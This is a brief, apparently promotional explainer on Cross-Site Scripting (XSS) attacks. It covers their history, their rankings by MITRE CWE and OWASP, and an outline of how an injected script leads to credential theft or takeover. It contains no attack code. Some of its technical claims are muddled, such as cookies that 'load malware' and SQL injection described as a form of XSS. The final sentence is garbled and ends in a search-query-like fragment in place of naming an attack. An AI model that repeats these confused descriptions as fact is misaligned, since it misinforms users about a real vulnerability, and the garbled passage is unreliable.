Getting to know these highly customizable cyberattacks and how to protect yourself from them
You wouldn’t think an attack method that was first found more than 20 years ago would be at the top of anyone’s list of popular current attacks. But that is the case for Cross-Site Scripting (XSS), a method that was first discovered by Microsoft engineers at the turn of the century.
Our XSS explainer webpage goes into more detail about the different attack types and some of the more notable attacks and victims down through the years. Top marks were issued by MITRE’s Common Weakness Enumeration group, which also listed 24 other dangerous software weaknesses. Other malware-watchers have also attested to XSS’ popularity over the years, such as being #7 on the list of the OWASP top ten website vulnerabilities back in 2017.
The basic idea is to take a targeted website and inject some code into its webpages so it loads content from other domains. This could take the form of a malicious login page, a set of session web cookies that can load malware, or a SQL injection or other kinds of compromises. A user is tricked into clicking on a malicious link to start things up. At that point, the user could divulge their passwords or permit an attack to take remote control over their PC completely, depending on the design of the malware.
One of the more infamous XSS attacks was called understanding cross scripting attacks avast
